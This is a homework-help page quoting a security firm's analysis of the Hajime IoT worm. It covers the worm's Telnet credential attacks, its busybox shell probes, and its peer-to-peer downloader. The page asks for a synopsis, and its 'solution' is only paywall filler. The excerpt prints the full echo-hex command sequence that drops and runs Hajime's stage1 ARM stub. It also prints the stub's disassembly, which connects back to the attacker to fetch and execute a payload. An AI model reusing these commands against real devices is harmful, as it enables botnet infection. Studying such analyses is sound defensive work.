Question
Background On Sep. 30, 2016, the source code for M irai , a prolific internet worm/botnet targeting embedded/IoT Linux devices, was released on the website
Background
On Sep. 30, 2016, the source code for M irai, a prolific internet worm/botnet targeting
embedded/IoT Linux devices, was released on the website hackforums.com by its author, an
individual pseudonom ously known only as A nna-senpai.1 Because Anni-senpai had claimed that
Mirai had infected over 380,000 devices, and that the malware had been responsible for a
record 620 Gbps distributed denial-of-service (DDoS) attack, the computer security community
very quickly took int erest in examining the source code and understanding Mirais operation.
The Security Research Group (SRG) at Rapidity Networks, Inc. also took an interest in
understanding the Mirai worm, and after completing its initial examination of the released source
code, set out to capture a sample in the wild. To do this, the SRG deployed a network of
medium-interaction honeypotscomputer systems intended to attract malicious activity for
information-gathering purposesconfigured to mimic a vulnerable IoT device of the sort Mirai
infects, in the hopes that a live Mirai node would soon discover the honeypot system and
attempt to conscript it.
On Oct. 5, 2016, a node within the honeypot network reported internet activity that very closely
resembled the reconnaissance and infection behaviors of M irai. However, upon closer analysis,
the SRG discovered that the sample it had captured was not Mirai, but rather something
considerably more sophisticated. The SRG conducted online searches in an attempt to identify
its unknown specimen, but could not find any indication that this particular worm had yet been
discovered by the broader security community.
Becaus e this worm very closely mimics the discovery and attack phases of Mirai, a worm
named for the Japanese word for future, the SRG researchers affectionately gave this sample
the moniker of HajimeJapanese for beginning.
Like many internet worms, the Hajime malware has a lifecycle. A Hajime infection begins when
a node already in the Hajime networkscanning random IPv4 addresses on the public
internetdiscovers a device which accepts connections on TCP port 23, the designated port for
the Telnet service. The attacking H ajime node attempts several username and password
combinations from its hardcoded list of credentials and, upon being granted entry, examines the
target system and begins its infection in stages. The first stage is a small, short-lived file-transfer
program which connects back to the attacking node and copies down a much larger download
program. The download programthe second stagejoins a peer-to-peer decentralized network
and retrieves its configuration and a scanning program. The scanning program searches the
public internet for more vulnerable systems to infect, thus continuing the lifecycle.
Stage 0: Reconnaissance and infection phase
This stage occurs completely over the initial Telnet session and does not actually involve an
uploaded binary. As such, we have opted to call this stage 0, because while it is important in
establishing a foothold in a vulnerable device, there is no actual malware present on the device
yet. All logic for stage 0 is actually implemented in the attacking node.
An attacking node scans the IPv4 address space at random. It repeatedly generates random
IPv4 addresses, attempts to connect to them on port 23, and attempts to log in by sequentially
going through a table of username/password credential pairs.
After each pair of credentials, Hajime waits for a response from the target device. If the
credentials are rejected, Hajime closes the current connection, reconnects, and tries the next
pair. While many of these credential pairs can be found in M irai (i.e. their hardcoded credentials
lists are similar), they differ in their login behavior: H ajime follows its credentials list sequentially,
while Mirai makes login attempts in a weighted random order.
Once a successful username/password combination is found, Hajime attempts to get access to
a Linux shell by sending the following 5 lines:
enable
system
shell
sh
/bin/busybox ECCHI
The first 4 lines are sent in a blind attempt to navigate whatever vendor-specific command-line
interface (CLI) the Telnet server implements. enable is a common CLI command to allow access
Rapidity Networks
Security Research Group Page 3 of 18
to privileged-mode commands. system attempts to navigate to a menu of system-management
options. shell and sh attempt to run a Bourne shell. If any command fails, it will fail
The purpose of the final /bin/busybox ECCHI line is to test that a Linux shell has actually been
started. A proprietary CLI is likely to reject the command, but a legitimate Linux shell would
execute Busybox, which will reject the argument with ECCHI: applet not found , letting Hajime
know that it has a bona fide Linux shell.
Once Hajime has confirmed its access to the target devices shell, it begins analyzing the target
device. First, it checks the system mounts for a writeable location in the target filesystem:
# cat /proc/mounts; /bin/busybox ECCHI
Note the repeat of the venerable /bin/busybox ECCHI command, which serves a purpose not
dissimilar to its use before: Hajime and M irai both use the E CCHI: applet not found signature to
find the end of the command lines output.
Hajime picks the first writeable path that is not /proc, /sys, or / and uses that as its working path.
This sequence serves multiple purposes. First, it tests if theres already a stage1 binary present.
Second, it tests that the chosen working directory really is writeable. Finally, it retrieves the
/bin/echo binary so that Hajime can inspect its header to determine the targets processor
architecture. Once the target processor is determined, Hajime uploads and executes the stage1
binary:
# echo -ne
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\
x00\x54\x00\x01\x00\x34\x00\x00\x00\x44\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x2
8\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" > .s; /bin/busybox
ECCHI
# echo -ne
"\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\
xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x9
0\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\
xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2
d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\
xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x0
0\xef\x02\x00\x12\x1c\xc6\x33\x64\x7b\x41\x2a\x00\x00\x00\x61\x65\x61" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x62\x69\x00\x01\x20\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\
x08\x01\x09\x02\x0a\x03\x0c\x01\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2
e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x0
0\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00" >> .s; /bin/busybox
ECCHI
# echo -ne
"\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\
x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" >> .s; /bin/busybox
ECCHI
# echo -ne
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s; /bin/busybox ECCHI
# cp .s .i; >.i; ./.s>.i; ./.i; rm .s; /bin/busybox ECCHI
Stage 1: Downloader stub
The above binary is a 484-byte ELF program. The intuitive thing, of course, is to run this through
a disassembler:
.text:00010054 A REA .text, CODE
.text:00010054 ; ORG 0x10054
.text:00010054 C ODE32
.text:00010054 M OV R0, # 2
.text:00010058 M OV R1, # 1
.text:0001005C M OV R2, # 6
.text:00010060 S TMFD SP!, {R0-R2}
.text:00010064 M OV R0, # 1
.text:00010068 M OV R1, SP
.text:0001006C S VC 0x900066 ; socketcall (socket)
.text:00010070 A DD SP, SP, # 0xC
.text:00010074 M OV R6, R0
.text:00010078 A DR R1, sa_server
.text:0001007C M OV R2, # 0x10
.text:00010080 S TMFD SP!, {R0-R2}
.text:00010084 M OV R0, # 3
.text:00010088 M OV R1, SP
.text:0001008C S VC 0x900066 ; socketcall (connect)
.text:00010090 A DD SP, SP, # 0x14
.text:00010094 S UB R4, SP, # 0x13C
.text:00010098 S UB R5, R5, R5
.text:0001009C
.text:0001009C loc_1009C ; CODE XREF: .text:000100DC j
.text:0001009C M OV R0, R6
.text:000100A0 M OV R1, R4
.text:000100A4 M OV R2, # 0x12C
.text:000100A8 M OV R3, # 0x100
.text:000100AC S TMFD SP!, {R0-R3}
.text:000100B0 M OV R0, # 0xA
.text:000100B4 M OV R1, SP
.text:000100B8 S VC 0x900066 ; socketcall (recv)
.text:000100BC A DD SP, SP, # 0x10
.text:000100C0 A DD R5, R5, R0
.text:000100C4 C MP R0, # 0
.text:000100C8 B LE loc_100E0
.text:000100CC M OV R2, R0
.text:000100D0 M OV R0, # 1 ; stdout
.text:000100D4 M OV R1, R4
.text:000100D8 S VC 0x900004 ; write
.text:000100DC B loc_1009C
.text:000100E0 ; ------------------------------------------------------------------------- --
.text:000100E0
.text:000100E0 loc_100E0 ; CODE XREF: .text:000100C8 j
.text:000100E0 A DD SP, SP, # 0x13C
.text:000100E4 S UB R0, R0, R0
.text:000100E8 M OV R7, # 1
.text:000100EC S VC 0 ; exit
.text:000100EC ; ------------------------------------------------------------------------- --
.text:000100F0 sa_server DCW 2 ; DATA XREF: .text:00010078o
.text:000100F0 ; AF_INET
.text:000100F2 D CW 0x1C12 ; port 4636
.text:000100F4 D CD 0x7B6433C6 ; address 198.51.100.123
.text:000100F4 ; .text end s
This program serves a very simple purpose: establish a TCP connection back to the attacking
host and write all received bytes out to stdout, where it gets piped to the .i file and executed.
Whats striking about this program is that its hand-written specifically for this platform. As we will
show later, Hajime is a multi-platform worm, and creating hand-crafted assembly programs for
each supported platform is a task involving significant effort.
The stub connects to a hardcoded IP address and port, rather than implement command-line
parsing logic. This means the Hajime attack code needs to know the offset to the embedded
sockaddr_in structure, for each of its stubs, for each of its platforms.
Our honeypots do not execute untrusted binary code, so they did not automatically download
the stage2 binary. However, our researchers were able to catch and disassemble a fresh stage1
binary fast enough to get the IP:port information from an attacking host before it closed its TCP
socket.
Hajime does not verify that connections to its malware distribution port are originating from
attacked hosts. This allowed the SRG researchers to connect later and download the stage2
binary at their leisure.
Stage 2: DHT downloader
The stage 2 binary is the second and final stage of the Hajime worm. It is responsible for
retrieving and executing any additional payloads retrieved off the P2P network that the malware
authors have established. The P2P network is built upon several protocols used in B itTorrent.2
Structure
This stage is statically-linked. The SRG quickly identified several of the libraries that the author
had chosen for inclusion:
For information exchange, Hajime piggybacks on BitTorrents DHT overlay network. For this, the
author linked against a heavily modified variant of the Kademlia implementation found in
KadNode.7 To transfer files with its peers, H ajime uses the uTP implementation found in l ibutp.8
Hajime downloads files in a custom format which often contain payloads compressed with the
LZ4 algorithm, and thus includes the decompression function from the LZ4 project.9
Through function call signature fingerprinting and by identifying functions by their logic, SRG
researchers managed to successfully map out most of the primary and auxiliary functions for
these libraries to better understand how they are used by H ajime
Write up a COMPLETE SYNOPSIS of the malware Hajime, what it does, how it works, etc. and where it did damage in your own language
Step by Step Solution
There are 3 Steps involved in it
Step: 1
Get Instant Access to Expert-Tailored Solutions
See step-by-step solutions with expert insights and AI powered tools for academic success
Step: 2
Step: 3
Ace Your Homework with AI
Get the answers you need in no time with our AI-driven, step-by-step assistance
Get Started